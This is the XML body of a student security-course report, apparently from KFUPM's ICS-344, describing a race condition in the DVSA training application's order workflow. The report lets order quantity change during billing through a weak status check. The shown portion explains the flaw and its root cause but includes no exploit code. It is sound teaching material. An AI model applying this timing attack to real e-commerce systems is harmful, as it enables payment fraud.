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1F061" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFF7A94" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770E4239" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790F8954" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="400" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ICS-344: Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641448D6" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Course Project: DVSA Vulnerability Discovery and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B142D" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A820BC4" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lesson #8: Logic Vulnerability (Race Condition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A3D24" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D846E0" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A5297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A52975" w14:paraId="50D1B1C5" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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2523CD14" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="686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697F399A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="5CBC1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79DB0D4" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Course / Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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7957BD3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ICS-344 — Information Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="4B325CC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415598" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Institution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7D8A60" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>King Fahd University of Petroleum and Minerals (KFUPM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="773CE7E6" w14:textId="77777777">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61DA783" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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AB04467" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>252</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="79AD54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996381" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DVSA Website URL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8B3CED" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>http://dvsa-ibrahim-2026-290304998824-us-east-1.s3-website.us-east-1.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="7BF3E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97E2542" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>API Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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76800CF" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>https://g094q0pn3g.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="4C16F1A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3EA31A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>AWS Region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041143" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>us-east-1 (N. Virginia)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="3C769C22" w14:textId="77777777">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740B9D5" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>AWS Account ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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925DC05" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>290304998824</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="72157E9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50A8FB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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6F7CDA" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>May 3, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="34FE06E5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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DA6B7C2" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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FE450D6" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic Vulnerability — Race Condition in Order Update Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="105B6147" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAF8B5B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1581DC22" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 1) Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6AF10" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This lesson demonstrates </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a Logic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Vulnerability in the form of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a race condition</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the DVSA order processing workflow. The application fails to properly lock the order state during billing, allowing a concurrent update request to modify the order quantity after billing has started but before it completes. This means an attacker can pay for one item but receive five items by exploiting the timing gap between the billing and update operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6C0D1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB0011F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Type: Logic Vulnerability — Race Condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127CB05" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Component: API Gateway → Lambda (DVSA-ORDER-BILLING and DVSA-ORDER-UPDATE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA4409A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Security Impact: An attacker can modify order quantity during billing, paying for fewer items than they receive — a business logic fraud attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F4038" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Main Weakness: The order update function uses a weak status check (&gt; 110) that allows modifications while billing is in progress (status 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F757E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362B31C0" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable status check in DVSA-ORDER-UPDATE allows cart modifications </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the order status is 100 (open) or 110 (payment failed). Since billing takes a non-zero amount of time to complete, an attacker can submit an update request simultaneously with the billing request and win the race condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32205776" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC81300" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2) Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DA545" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability exists because of a weak order state validation in the update Lambda function. The DVSA order status flow is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809F95F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A5297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60"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A52975" w14:paraId="4357328D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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51B078EB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Status Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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7A1BAD2E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336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12CFA770" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Should Allow Update?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="04FD2515"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33B3447" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>100</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1512E3C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Open — order created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2676E3E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="7528ED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84411C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>110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C2CF00" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Payment failed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8C0857" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No — payment attempted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="447B181B"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E2D8B65" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>120</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4496772" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Paid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F1284BD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="7C8F1DD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58AEA8" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>200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313DA0" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Processing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15C764" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="698C43B5"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979DCFD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>210</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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31F9BD1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Shipped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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EA98CD3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="13E788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0E546A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>300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C9424B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Delivered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0124A5" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="347C2A9D" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7B85F4" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerable code checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCEAEF8" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071B24F5"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if response["Item"]["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"] &gt; 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37657BB5" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B47AB24" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This means updates are allowed at status 100 AND 110. Since billing runs asynchronously and the status only changes after billing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>completes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, an attacker can send an update request at the same time as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>billing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the update will succeed because the status is still 100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D5C7F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F523480" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3) Environment and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52975" w14:paraId="7B678C8A" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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4FB4ED76" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="656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6B06B556" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="7D8D7103"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E878457" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DVSA Website</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FECE156" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>http://dvsa-ibrahim-2026-290304998824-us-east-1.s3-website.us-east-1.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="5D90FD5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3578F3" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>API Endpoint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6DDBAB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>https://g094q0pn3g.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="649008F9"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E540B16" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>AWS Region</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93A16F9" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>us-east-1 (N. Virginia)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="5082705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B53358" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>AWS Account 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7F6640" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>290304998824</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="263EF71B"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71C2081" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DynamoDB Table</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D17D479" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DVSA-ORDERS-DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="33CF431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9A95C8" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Lambda Functions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D7104BB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DVSA-ORDER-BILLING, DVSA-ORDER-UPDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="4764B140"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14CA171" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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63DA43B7" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
